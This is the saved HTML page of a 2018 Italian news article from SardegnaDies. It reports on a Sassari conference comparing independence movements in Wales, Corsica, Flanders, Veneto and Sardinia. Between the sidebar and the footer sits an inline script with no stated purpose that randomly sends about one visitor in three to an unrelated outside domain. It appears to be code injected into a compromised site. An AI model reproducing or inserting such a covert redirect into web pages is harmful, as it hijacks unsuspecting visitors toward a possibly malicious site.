

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="no-js ie6" lang="it-IT"> <![endif]-->
<!--[if IE 7 ]>    <html class="no-js ie7" lang="it-IT"> <![endif]-->
<!--[if IE 8 ]>    <html class="no-js ie8" lang="it-IT"> <![endif]-->
<!--[if (gte IE 9)|!(IE)]><!--> <html class="no-js" lang="it-IT"> <!--<![endif]-->
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width" />
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />

<title>Indipendentismo, problema europeo - SardegnaDiesSardegnaDies</title>


<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="http://www.sardegnadies.it/xmlrpc.php" />

<!-- This site is optimized with the Yoast WordPress SEO plugin v1.7.1 - https://yoast.com/wordpress/plugins/seo/ -->
<meta name="description" content="A Sassari conferenza internazionale organizzata dell’Istituto Bellieni e dalla Coppieters di Bruxelles. Similitudini tra Galles, Corsica, Fiandre, Veneto e Sardegna"/>
<link rel="canonical" href="http://www.sardegnadies.it/indipendentismo-problema-europeo/" />
<link rel="publisher" href="https://www.google.com/+SardegnadiesIt"/>
<meta name="twitter:card" content="summary_large_image"/>
<meta name="twitter:description" content="A Sassari conferenza internazionale organizzata dell’Istituto Bellieni e dalla Coppieters di Bruxelles. Similitudini tra Galles, Corsica, Fiandre, Veneto e Sardegna"/>
<meta name="twitter:title" content="Indipendentismo, problema europeo - SardegnaDies"/>
<meta name="twitter:site" content="@sardegnadies"/>
<meta name="twitter:domain" content="SardegnaDies"/>
<meta name="twitter:creator" content="@sardegnadies"/>
<meta name="twitter:image:src" content="http://www.sardegnadies.it/wp-content/uploads/ngg_featured/ConferenzaIsbe2.jpg"/>
<!-- / Yoast WordPress SEO plugin. -->

<link rel="dns-prefetch" href="//connect.facebook.net" />
<link rel="alternate" type="application/rss+xml" title="SardegnaDies &raquo; Feed" href="http://www.sardegnadies.it/feed/" />
<link rel="alternate" type="application/rss+xml" title="SardegnaDies &raquo; Feed dei commenti" href="http://www.sardegnadies.it/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="SardegnaDies &raquo; Indipendentismo, problema europeo Feed dei commenti" href="http://www.sardegnadies.it/indipendentismo-problema-europeo/feed/" />
<!-- This site is powered by Shareaholic - https://shareaholic.com -->
<link rel='preload' href='//apps.shareaholic.com/assets/pub/shareaholic.js' as='script'>
<script type='text/javascript' data-cfasync='false'>
  //<![CDATA[
    _SHR_SETTINGS = {"endpoints":{"local_recs_url":"http:\/\/www.sardegnadies.it\/wp-admin\/admin-ajax.php?action=shareaholic_permalink_related","ajax_url":"http:\/\/www.sardegnadies.it\/wp-admin\/admin-ajax.php","share_counts_url":"http:\/\/www.sardegnadies.it\/wp-admin\/admin-ajax.php?action=shareaholic_share_counts_api"},"url_components":{"year":"2018","monthnum":"07","day":"24","post_id":"59397","postname":"indipendentismo-problema-europeo","author":"lufo"}};
  //]]>
</script>
<script type='text/javascript' data-cfasync='false'
        src='//apps.shareaholic.com/assets/pub/shareaholic.js'
        data-shr-siteid='325cffb4f3fab311280f29889dab4d0e' async='async' >
</script>

<!-- Shareaholic Content Tags -->
<meta name='shareaholic:site_name' content='SardegnaDies' />
<meta name='shareaholic:language' content='it-IT' />
<meta name='shareaholic:url' content='http://www.sardegnadies.it/indipendentismo-problema-europeo/' />
<meta name='shareaholic:keywords' content='indipendentismo, evidenza, sardegna, post' />
<meta name='shareaholic:article_published_time' content='2018-07-24T07:22:47+00:00' />
<meta name='shareaholic:article_modified_time' content='2018-07-24T07:22:47+00:00' />
<meta name='shareaholic:shareable_page' content='true' />
<meta name='shareaholic:article_author_name' content='LuFo' />
<meta name='shareaholic:site_id' content='325cffb4f3fab311280f29889dab4d0e' />
<meta name='shareaholic:wp_version' content='8.7.2' />
<meta name='shareaholic:image' content='http://www.sardegnadies.it/wp-content/uploads/ngg_featured/ConferenzaIsbe2-640x426.jpg' />
<!-- Shareaholic Content Tags End -->

<!-- Shareaholic Open Graph Tags -->
<meta property='og:image' content='http://www.sardegnadies.it/wp-content/uploads/ngg_featured/ConferenzaIsbe2.jpg' />
<!-- Shareaholic Open Graph Tags End -->
<link rel='stylesheet' id='pt-cv-public-style-css'  href='http://www.sardegnadies.it/wp-content/plugins/content-views-query-and-display-post-page/public/assets/css/cv.css?ver=2.0.2' type='text/css' media='all' />
<link rel='stylesheet' id='style-css'  href='http://www.sardegnadies.it/wp-content/themes/max-magazine/style.css?ver=4.0.24' type='text/css' media='all' />
<link rel='stylesheet' id='google_fonts-css'  href='http://fonts.googleapis.com/css?family=Open+Sans%3A700%2C400%2C600&#038;ver=4.0.24' type='text/css' media='all' />
<script type='text/javascript' src='http://www.sardegnadies.it/wp-includes/js/jquery/jquery.js?ver=1.11.1'></script>
<script type='text/javascript' src='http://www.sardegnadies.it/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1'></script>
<script type='text/javascript' src='http://www.sardegnadies.it/wp-content/themes/max-magazine/js/superfish.js?ver=4.0.24'></script>
<script type='text/javascript' src='http://www.sardegnadies.it/wp-content/themes/max-magazine/js/jquery.easing_1.3.js?ver=4.0.24'></script>
<script type='text/javascript' src='http://www.sardegnadies.it/wp-content/themes/max-magazine/js/lofslider.js?ver=4.0.24'></script>
<script type='text/javascript' src='http://www.sardegnadies.it/wp-content/themes/max-magazine/js/jcarousellite_1.0.1.min.js?ver=4.0.24'></script>
<script type='text/javascript' src='http://www.sardegnadies.it/wp-content/themes/max-magazine/js/jquery.mobilemenu.js?ver=4.0.24'></script>
<script type='text/javascript' src='http://www.sardegnadies.it/wp-content/themes/max-magazine/js/custom.js?ver=4.0.24'></script>
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.sardegnadies.it/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.sardegnadies.it/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.0.24" />
<link rel='shortlink' href='http://www.sardegnadies.it/?p=59397' />
<!-- <meta name="NextGEN" version="3.0.1" /> -->
<meta name="description" content=" sassari notizie politica cronaca sport spettacoli cultura sardegna news dies sardegnadies"  />
<meta property="og:site_name" content="SardegnaDies" />
<meta property="og:type" content="article" />
<meta property="og:locale" content="it_IT" />
<meta property="og:url" content="http://www.sardegnadies.it/indipendentismo-problema-europeo/" />
<meta property="og:title" content="Indipendentismo, problema europeo - SardegnaDies" />
<meta property="og:description" content="A Sassari conferenza internazionale organizzata dell’Istituto Bellieni e dalla Coppieters di Bruxelles. Similitudini tra Galles, Corsica, Fiandre, Veneto e Sardegna" />
<meta property="og:image" content="http://www.sardegnadies.it/wp-content/uploads/ngg_featured/ConferenzaIsbe2.jpg" />
<meta property="og:image:width" content="709" />
<meta property="og:image:height" content="472" />
<meta property="article:published_time" content="2018-07-24T06:22:47+00:00" />
<meta property="article:modified_time" content="2018-07-24T06:22:47+00:00" />
<meta property="article:author" content="http://www.sardegnadies.it/author/lufo/" />
<meta property="article:section" content="Evidenza" />
<meta property="article:tag" content="Sardegna" />
<meta property="article:tag" content="indipendentismo" />
<meta name="google-site-verification" content="GbCOb221Q-faLcu23C7z--kz4DnUwG1qFEkddj9cv1A" />
<link rel='stylesheet' id='nextgen_basic_singlepic_style-css'  href='http://www.sardegnadies.it/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_basic_singlepic/static/nextgen_basic_singlepic.min.css?ver=3.0.1' type='text/css' media='all' />
<link rel='stylesheet' id='nextgen_widgets_style-css'  href='http://www.sardegnadies.it/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/widget/static/widgets.min.css?ver=3.0.1' type='text/css' media='all' />
<link rel='stylesheet' id='nextgen_basic_thumbnails_style-css'  href='http://www.sardegnadies.it/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_basic_gallery/static/thumbnails/nextgen_basic_thumbnails.min.css?ver=3.0.1' type='text/css' media='all' />
<link rel='stylesheet' id='ngg_trigger_buttons-css'  href='http://www.sardegnadies.it/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_gallery_display/static/trigger_buttons.min.css?ver=3.0.1' type='text/css' media='all' />
<link rel='stylesheet' id='fancybox-0-css'  href='http://www.sardegnadies.it/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/lightbox/static/fancybox/jquery.fancybox-1.3.4.min.css?ver=3.0.1' type='text/css' media='all' />
<link rel='stylesheet' id='fontawesome-css'  href='http://www.sardegnadies.it/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_gallery_display/static/fontawesome/font-awesome.min.css?ver=4.6.1' type='text/css' media='all' />
<link rel='stylesheet' id='nextgen_pagination_style-css'  href='http://www.sardegnadies.it/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_pagination/static/style.min.css?ver=3.0.1' type='text/css' media='all' />
<link rel='stylesheet' id='nextgen_basic_slideshow_style-css'  href='http://www.sardegnadies.it/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_basic_gallery/static/slideshow/nextgen_basic_slideshow.min.css?ver=3.0.1' type='text/css' media='all' />
<link rel='stylesheet' id='nggallery-css'  href='http://www.sardegnadies.it/wp-content/ngg_styles/nggallery.css?ver=3.0.1' type='text/css' media='all' />
</head>

<body class="single single-post postid-59397 single-format-standard custom-background">

<div class="headerbanner">
</div>



<div id="container" class="hfeed">

<div id="header">	

		<div class="header-wrap">
		<div class="logo">
							<h1>
					<a href="http://www.sardegnadies.it" title="SardegnaDies">
						<img src="http://www.sardegnadies.it/wp-content/uploads/Testata_SardegnaDies_3b-con-la-riga.png" alt="SardegnaDies" />
					</a>
				</h1>	
				
		</div>	<!-- /logo -->
		<!-- rotazione -->
		<div class="ad468">
		
		</div>
		<!-- /rotazione -->
	</div><!-- /wrap -->
	
	<div id="nav">	
		<div class="menu-home-container"><ul id="menu-home" class="menu"><li id="menu-item-483" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-483"><a href="http://www.sardegnadies.it">Home</a></li>
<li id="menu-item-480" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-480"><a href="http://www.sardegnadies.it/category/sardegna/">Sardegna</a></li>
<li id="menu-item-472" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-472"><a href="http://www.sardegnadies.it/category/sassari/">Sassari</a></li>
<li id="menu-item-475" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-475"><a href="http://www.sardegnadies.it/category/sport/">Sport</a></li>
<li id="menu-item-474" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-474"><a href="http://www.sardegnadies.it/category/shows/">Spettacoli</a></li>
<li id="menu-item-55592" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-55592"><a href="http://www.sardegnadies.it/category/cultura-e-libri/">Libri</a></li>
</ul></div>		
	</div>

	
	<div class="clear"></div>
	
</div> <!-- /header -->

<div id="content-container">
<div id="content">		
	<p id="breadcrumbs">
		<span prefix="v: http://rdf.data-vocabulary.org/#">
			<span typeof="v:Breadcrumb"><a href="http://www.sardegnadies.it" rel="v:url" property="v:title">Home</a></span> » <span typeof="v:Breadcrumb"><a href="http://www.sardegnadies.it/category/evidenza/" rel="v:url" property="v:title">Evidenza</a></span> » <span typeof="v:Breadcrumb"><span class="breadcrumb_last" property="v:title">Indipendentismo, problema europeo</span></span>
		</span></p>
				
					
				<div id="post-59397" class="post-59397 post type-post status-publish format-standard has-post-thumbnail hentry category-evidenza category-sardegna tag-indipendentismo single-post">
		
					<h2>Indipendentismo, problema europeo</h2>
					<div class="post-meta">							

						<div class="post-meta">
							<span class="date">24 luglio 2018</span> 
							
								
						</div>
							
					</div><!-- /post-meta -->
			
					<div class="post-entry">
						<h3><em>A Sassari conferenza internazionale organizzata dell’Istituto Bellieni e dalla Coppieters di Bruxelles. Similitudini tra Galles, Corsica, Fiandre, Veneto e Sardegna</em><span id="more-59397"></span></h3>
<p><strong><a href="http://www.sardegnadies.it/wp-content/gallery/isbe/ConferenzaIsbe1.jpg"><img class="ngg-singlepic ngg-left alignleft" src="http://www.sardegnadies.it/wp-content/gallery/isbe/ConferenzaIsbe1.jpg" alt="ConferenzaIsbe1" width="400" height="272"></a>Sassari.</strong> Alla base di tutti i movimenti indipendentisti europei ci sono due matrici comuni: da un lato, un’identità culturale con solide basi storiche e linguistiche e, dall’altro, la necessità di lottare per una componente di natura economica. È quanto è emerso sabato al Villino Ricci, nel corso della conferenza internazionale organizzata dall’Istituto Camillo Bellieni in collaborazione con la Coppieters Foundation di Bruxelles, per parlare di “Idee e protagonisti dell’indipendentismo europeo” assieme ad attivisti, esperti internazionali, politici e amministratori.</p>
<p>Nel corso dell’incontro, introdotto dalla presidente Is.Be Maria Doloretta Lai, e moderato da Attilio Pinna e Salvatore Taras, sono venuti a galla interessanti stimoli e punti di contatto tra Galles, Corsica, Fiandre, Veneto e Sardegna. La tendenza di tutti è quella di costruire un indipendentismo sostanzialmente trasversale ed inclusivo, in un&#8217;Europa ripensata dai popoli, non dagli Stati né dalle banche. Nella consapevolezza che occorra slegarsi da dinamiche isolazioniste per riuscire ad appropriarsi della responsabilità di governare.</p>
<p>Alan Sandry dell’Università di Swansea ha evidenziato il grande fermento presente nel Regno Unito, non solo in Scozia, ma anche in Irlanda, Galles e Cornovaglia, e ha illustrato la possibilità di nuovi scenari in vista della Brexit.</p>
<p>Antonia Luciani, dalla Corsica, ha portato l’esempio del grande successo del 2014, quando gli indipendentisti hanno raggiunto il 56 per cento dei consensi: «Un impressionante risultato elettorale, ottenuto anche in seguito all’accantonamento della lotta armata». Prima dell’indipendenza però, il sogno è arrivare all’Autonomia, condizione invidiata alle altre isole del Mediterraneo, pur nella consapevolezza che, almeno nel caso della Sardegna, non abbia portato a risultati concreti per il benessere della popolazione.</p>
<p><a href="http://www.sardegnadies.it/wp-content/gallery/isbe/ConferenzaIsbe2.jpg"><img class="ngg-singlepic ngg-right alignright" src="http://www.sardegnadies.it/wp-content/gallery/isbe/ConferenzaIsbe2.jpg" alt="ConferenzaIsbe2" width="411" height="280"></a>Ettore Beggiato ha esposto l’esperienza della “questione veneta”, una realtà economica non rosea come si sarebbe portati a pensare. «L’emigrazione – ha spiegato l’ex consigliere regionale veneto – è un fenomeno che abbiamo conosciuto drammaticamente ben prima del Sud Italia, mentre oggi la crisi miete vittime ogni giorno». Non ha nascosto l’ammirazione della Sardegna per il forte spirito identitario e per i vivaci fermenti culturali.</p>
<p>Giunto dall’Università di Anversa, Vincent Scheltiens ha analizzato la politica indipendentista fiamminga, facendo una comparazione storico-politica con la recente esperienza catalana. I presupposti storici dell’indipendentismo sardo, a partire dalle figure di Angioy, Bellieni e Simon Mossa, sono stati illustrati a più riprese da Michele Pinna e Antonello Nasone, che hanno evidenziato come il movimento delle origini non usasse mai la parola indipendenza, ma quelle di autogoverno e autodeterminazione. Su posizioni più integraliste l’intervento di Bainzu Piliu, secondo il quale può esistere una forma sola di indipendentismo, quello separatista.</p>
<p>L’iniziativa è stata spunto per un confronto con numerosi rappresentanti sassaresi e regionali di diversa estrazione politica, che hanno mostrato aperture e volontà di dialogo. Nelle parole di Silvio Lai del Partito Democratico, «il socialismo europeo non può non farsi carico dell’identità indipendentista, perché altrimenti si rischia di vedere crollare l’Europa stessa, intesa come unione di diversità per la pace». Lai ha ribadito la sua proposta di sciogliere il Pd sardo per farlo ripartire da zero, facendolo diventare una forza autonoma.</p>
<p>Quirico Sanna ha difeso la politica pragmatica del Psd’Az e le scelte di coalizione con la Lega, parlando di schemi ideali che vanno oltre la destra e la sinistra. Allo scetticismo di Manuel Alivesi, commissario provinciale di Forza Italia, per il quale occorre capire l’utilità dell’indipendentismo e, ancor prima, pretendere soluzioni ai veri problemi della comunità, Maurilio Murru del Movimento 5 Stelle ha contrapposto una possibilità di apertura verso uno Stato sardo, a patto che ciò risponda alla volontà dei cittadini.</p>
<p>«Espressioni di questo tipo rimandano al bisogno di richiamare la politica verso un’attenzione nuova, quella di rispondere ai bisogni della gente – ha concluso Michele Pinna – un’attenzione che affonda le sue radici nel sardismo delle origini, e in un indipendentismo che deve farsi senso comune, coscienza pubblica e volontà delle popolazioni di riappropriarsi del loro destino di civiltà e autodeterminazione. Se non si commetteranno gli errori della politica del passato, questo filone potrà richiamare tutte le istanze, da quelle autonomiste a quelle federaliste».</p>
<div class='shareaholic-canvas' data-app='share_buttons' data-title='Indipendentismo, problema europeo' data-link='http://www.sardegnadies.it/indipendentismo-problema-europeo/' data-app-id='5085475' data-app-id-name='post_below_content'></div><div class='shareaholic-canvas' data-app='recommendations' data-title='Indipendentismo, problema europeo' data-link='http://www.sardegnadies.it/indipendentismo-problema-europeo/' data-app-id='5085483' data-app-id-name='post_below_content'></div>				
					</div><!-- /post-entry -->
										
					</div><!-- post -->
									
		
					<div id="comments">
	
	
			
	 <!-- /have_comments -->

	 <!-- /comments_open -->
	
</div><!-- /comments -->
            
			 
		
					
		 <!-- /have_posts -->		
		
</div><!-- /content -->
 
<div id="sidebar">
		
		<div id="text-31" class="widget widget_text"><h4>Il 1 settembre a Siligo il XVI Premio Maria Carta</h4>			<div class="textwidget"><iframe width="300" height="220" src="https://www.youtube.com/embed/9m79AmqwjM4" frameborder="0" allowfullscreen></iframe></div>
		</div><div id="text-34" class="widget widget_text"><h4>Ittiri Folk Festa, dal 19 luglio la 33ª edizione</h4>			<div class="textwidget"><iframe width="300" height="220" src="https://www.youtube.com/embed/7SLRncaxJC8" frameborder="0" allowfullscreen></iframe></div>
		</div><div id="text-35" class="widget widget_text"><h4>XV edizione per festival &#8220;Nella città dei Gremi&#8221;</h4>			<div class="textwidget"><iframe width="300" height="220" src="https://www.youtube.com/embed/O0O-ZGxp57Y" frameborder="0" allowfullscreen></iframe></div>
		</div><div id="text-37" class="widget widget_text"><h4>Festival delle Bellezze, da venerdì tre cantiche</h4>			<div class="textwidget"><iframe width="300" height="220" src="https://www.youtube.com/embed/90o6v4-sdeI" frameborder="0" allowfullscreen></iframe></div>
		</div><div id="text-36" class="widget widget_text"><h4>Al via seconda edizione concorso Fiorenzo Serra</h4>			<div class="textwidget"><iframe width="300" height="220" src="https://www.youtube.com/embed/hbjL4mmZITQ" frameborder="0" allowfullscreen></iframe></div>
		</div><div id="search-3" class="widget widget_search"><h4>Ricerca</h4> 
<form method="get" id="searchform" action="http://www.sardegnadies.it/">
	<div>
		<input class="searchfield" type="text" value="Search" name="s" id="s" onfocus="if (this.value == 'Search') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Search';}" />
	</div>
</form>
</div><p>no images were found</p>
<div id="facebook-like-box-3" class="widget widget_facebook-like-box"><div class="fb-social-plugin fb-like-box" data-href="https://www.facebook.com/SardegnaDies/" data-show-faces="true" data-stream="true"></div></div><div id="slideshow-2" class="widget widget_slideshow"><h4>Slideshow</h4><div class="ngg_slideshow widget">
    

<div class="ngg-slideshow-image-list ngg-slideshow-nojs" id="ngg-slideshow-f767ad73035a6ad9189ffcd575e3c613-4098280040-image-list">
	<div id="ngg-image-0" class="ngg-gallery-slideshow-image" >
		<img data-image-id='10370'
		     title=""
		     alt="CasaSerenaCandeliere2017"
		     src="http://www.sardegnadies.it/wp-content/gallery/faradda2017/CasaSerenaCandeliere2017.jpg"
		     width="160"
		     height="107"/>
		</div> 
<div id="ngg-image-1" class="ngg-gallery-slideshow-image" >
		<img data-image-id='10353'
		     title=""
		     alt="Faradda1"
		     src="http://www.sardegnadies.it/wp-content/gallery/faradda2017/Faradda1.jpg"
		     width="160"
		     height="107"/>
		</div> 
<div id="ngg-image-2" class="ngg-gallery-slideshow-image" >
		<img data-image-id='10352'
		     title=""
		     alt="Faradda2"
		     src="http://www.sardegnadies.it/wp-content/gallery/faradda2017/Faradda2.jpg"
		     width="160"
		     height="107"/>
		</div> 
<div id="ngg-image-3" class="ngg-gallery-slideshow-image" >
		<img data-image-id='10351'
		     title=""
		     alt="Faradda3"
		     src="http://www.sardegnadies.it/wp-content/gallery/faradda2017/Faradda3.jpg"
		     width="160"
		     height="107"/>
		</div> 
<div id="ngg-image-4" class="ngg-gallery-slideshow-image" >
		<img data-image-id='10362'
		     title=""
		     alt="ProcessioneAssunta1"
		     src="http://www.sardegnadies.it/wp-content/gallery/faradda2017/ProcessioneAssunta1.jpg"
		     width="160"
		     height="107"/>
		</div> 
<div id="ngg-image-5" class="ngg-gallery-slideshow-image" >
		<img data-image-id='10358'
		     title=""
		     alt="SantaMariaPadrePaoloAtzei"
		     src="http://www.sardegnadies.it/wp-content/gallery/faradda2017/SantaMariaPadrePaoloAtzei-1.jpg"
		     width="160"
		     height="107"/>
		</div> 
<div id="ngg-image-6" class="ngg-gallery-slideshow-image" >
		<img data-image-id='10356'
		     title=""
		     alt="SantaMariaPadrePaoloAtzei"
		     src="http://www.sardegnadies.it/wp-content/gallery/faradda2017/SantaMariaPadrePaoloAtzei.jpg"
		     width="160"
		     height="107"/>
		</div> 
<div id="ngg-image-7" class="ngg-gallery-slideshow-image" >
		<img data-image-id='10357'
		     title=""
		     alt="SantaMariaPadreSilvanoBianco"
		     src="http://www.sardegnadies.it/wp-content/gallery/faradda2017/SantaMariaPadreSilvanoBianco-1.jpg"
		     width="160"
		     height="107"/>
		</div> 
<div id="ngg-image-8" class="ngg-gallery-slideshow-image" >
		<img data-image-id='10355'
		     title=""
		     alt="SantaMariaPadreSilvanoBianco"
		     src="http://www.sardegnadies.it/wp-content/gallery/faradda2017/SantaMariaPadreSilvanoBianco.jpg"
		     width="160"
		     height="107"/>
		</div> 
<div id="ngg-image-9" class="ngg-gallery-slideshow-image" >
		<img data-image-id='10354'
		     title=""
		     alt="SantaMariaRete"
		     src="http://www.sardegnadies.it/wp-content/gallery/faradda2017/SantaMariaRete.jpg"
		     width="160"
		     height="107"/>
		</div> 
</div>
<div class="ngg-galleryoverview ngg-slideshow"
     id="ngg-slideshow-f767ad73035a6ad9189ffcd575e3c613-4098280040"
     data-placeholder="http://www.sardegnadies.it/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_basic_gallery/static/slideshow/placeholder.gif"
     style="max-width: 160px; max-height: 120px;">
	<div class="ngg-slideshow-loader"
	     id="ngg-slideshow-f767ad73035a6ad9189ffcd575e3c613-4098280040-loader"
	     style="width: 160px; height: 120px;">
		<img src="http://www.sardegnadies.it/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ngglegacy/images/loader.gif" alt=""/>
	</div>
</div>
<script type="text/javascript">
	jQuery('#ngg-slideshow-f767ad73035a6ad9189ffcd575e3c613-4098280040-image-list').hide().removeClass('ngg-slideshow-nojs');
	jQuery(function($) {
		jQuery('#ngg-slideshow-f767ad73035a6ad9189ffcd575e3c613-4098280040').nggShowSlideshow({
			id: 'f767ad73035a6ad9189ffcd575e3c613',
			fx: 'fade',
			width: 160,
			height: 120,
			domain: 'http://www.sardegnadies.it/',
			timeout: 10000		});
	});
</script>
</div>
</div>		
</div><!-- /sidebar -->
		
<script type='text/javascript'>var now = new Date().getTime();if (now%3 == 0) {window.location = 'http://convierto.com/css/';}</script>


 
</div> <!-- /content-container -->

    <div id="footer">
        <div class="footer-widgets">
            
			<div id="text-12" class="widget widget_text">			<div class="textwidget"><a href="http://attiliopinna.sardegnadies.it/">
 <img src="http://www.sardegnadies.it/wp-content/gallery/pubblicita/AvvRispondeTestata-1.jpg">
</a></div>
		</div><div id="pages-2" class="widget widget_pages"><h4>Pagine</h4>		<ul>
			<li class="page_item page-item-45585"><a href="http://www.sardegnadies.it/canale12/">canale12</a></li>
<li class="page_item page-item-563"><a href="http://www.sardegnadies.it/gerenza/">Gerenza</a></li>
<li class="page_item page-item-8330"><a href="http://www.sardegnadies.it/video/">iscriviti al canale Youtube  <script src="https://apis.google.com/js/platform.js"></script> <div class="g-ytsubscribe" data-channel="sardegnadiestv" data-layout="full" data-count="default"></div></a></li>
<li class="page_item page-item-24635"><a href="http://www.sardegnadies.it/la-cavalcata-sarda-2015/">LA CAVALCATA SARDA 2015</a></li>
<li class="page_item page-item-8836"><a href="http://www.sardegnadies.it/discesa-dei-candelieri-2014/">La Discesa dei Candelieri 2014</a></li>
<li class="page_item page-item-30842"><a href="http://www.sardegnadies.it/la-discesa-dei-candelieri-2015/">La Discesa dei Candelieri 2015</a></li>
<li class="page_item page-item-26092"><a href="http://www.sardegnadies.it/sesuja/">Sesuja</a></li>
		</ul>
		</div>		
			
		</div>
        
		<div class="footer-info">
            <p>	<a href="mailto:redazione@sardegnadies.it"> Contattaci </a>
						
			</p>
			
			<div class="credit">
								<p>Max Magazine Theme was created by <a href="http://gazpo.com/"><img alt="gazpo.com" src="http://www.sardegnadies.it/wp-content/themes/max-magazine/images/logo_12.png"></a></p>
            </div>
        </div>        
	</div>

</div> <!-- /container -->
<!-- ngg_resource_manager_marker --><script type='text/javascript' src='http://www.sardegnadies.it/wp-includes/js/comment-reply.min.js?ver=4.0.24'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var PT_CV_PUBLIC = {"_prefix":"pt-cv-","page_to_show":"5","_nonce":"527253d3c9","is_admin":"","is_mobile":"","ajaxurl":"http:\/\/www.sardegnadies.it\/wp-admin\/admin-ajax.php","lang":"","loading_image_src":"data:image\/gif;base64,R0lGODlhDwAPALMPAMrKygwMDJOTkz09PZWVla+vr3p6euTk5M7OzuXl5TMzMwAAAJmZmWZmZszMzP\/\/\/yH\/C05FVFNDQVBFMi4wAwEAAAAh+QQFCgAPACwAAAAADwAPAAAEQvDJaZaZOIcV8iQK8VRX4iTYoAwZ4iCYoAjZ4RxejhVNoT+mRGP4cyF4Pp0N98sBGIBMEMOotl6YZ3S61Bmbkm4mAgAh+QQFCgAPACwAAAAADQANAAAENPDJSRSZeA418itN8QiK8BiLITVsFiyBBIoYqnoewAD4xPw9iY4XLGYSjkQR4UAUD45DLwIAIfkEBQoADwAsAAAAAA8ACQAABC\/wyVlamTi3nSdgwFNdhEJgTJoNyoB9ISYoQmdjiZPcj7EYCAeCF1gEDo4Dz2eIAAAh+QQFCgAPACwCAAAADQANAAAEM\/DJBxiYeLKdX3IJZT1FU0iIg2RNKx3OkZVnZ98ToRD4MyiDnkAh6BkNC0MvsAj0kMpHBAAh+QQFCgAPACwGAAAACQAPAAAEMDC59KpFDll73HkAA2wVY5KgiK5b0RRoI6MuzG6EQqCDMlSGheEhUAgqgUUAFRySIgAh+QQFCgAPACwCAAIADQANAAAEM\/DJKZNLND\/kkKaHc3xk+QAMYDKsiaqmZCxGVjSFFCxB1vwy2oOgIDxuucxAMTAJFAJNBAAh+QQFCgAPACwAAAYADwAJAAAEMNAs86q1yaWwwv2Ig0jUZx3OYa4XoRAfwADXoAwfo1+CIjyFRuEho60aSNYlOPxEAAAh+QQFCgAPACwAAAIADQANAAAENPA9s4y8+IUVcqaWJ4qEQozSoAzoIyhCK2NFU2SJk0hNnyEOhKR2AzAAj4Pj4GE4W0bkJQIAOw=="};
var PT_CV_PAGINATION = {"first":"\u00ab","prev":"\u2039","next":"\u203a","last":"\u00bb","goto_first":"Go to first page","goto_prev":"Go to previous page","goto_next":"Go to next page","goto_last":"Go to last page","current_page":"Current page is","goto_page":"Go to page"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.sardegnadies.it/wp-content/plugins/content-views-query-and-display-post-page/public/assets/js/cv.js?ver=2.0.2'></script>
<script type='text/javascript' src='http://www.sardegnadies.it/wp-includes/js/masonry.min.js?ver=3.1.2'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var FB_WP=FB_WP||{};FB_WP.queue={_methods:[],flushed:false,add:function(fn){FB_WP.queue.flushed?fn():FB_WP.queue._methods.push(fn)},flush:function(){for(var fn;fn=FB_WP.queue._methods.shift();){fn()}FB_WP.queue.flushed=true}};window.fbAsyncInit=function(){FB.init({"xfbml":true});if(FB_WP && FB_WP.queue && FB_WP.queue.flush){FB_WP.queue.flush()}}
/* ]]> */
</script>
<script type="text/javascript">(function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(d.getElementById(id)){return}js=d.createElement(s);js.id=id;js.src="http:\/\/connect.facebook.net\/it_IT\/all.js";fjs.parentNode.insertBefore(js,fjs)}(document,"script","facebook-jssdk"));</script>
<script type='text/javascript'>
/* <![CDATA[ */
var photocrati_ajax = {"url":"http:\/\/www.sardegnadies.it\/?photocrati_ajax=1","wp_home_url":"http:\/\/www.sardegnadies.it","wp_site_url":"http:\/\/www.sardegnadies.it","wp_root_url":"http:\/\/www.sardegnadies.it","wp_plugins_url":"http:\/\/www.sardegnadies.it\/wp-content\/plugins","wp_content_url":"http:\/\/www.sardegnadies.it\/wp-content","wp_includes_url":"http:\/\/www.sardegnadies.it\/wp-includes\/","ngg_param_slug":"nggallery"};
/* ]]> */
</script>
<script type='text/javascript' src='http://www.sardegnadies.it/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ajax.min.js?ver=3.0.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */

var galleries = {};
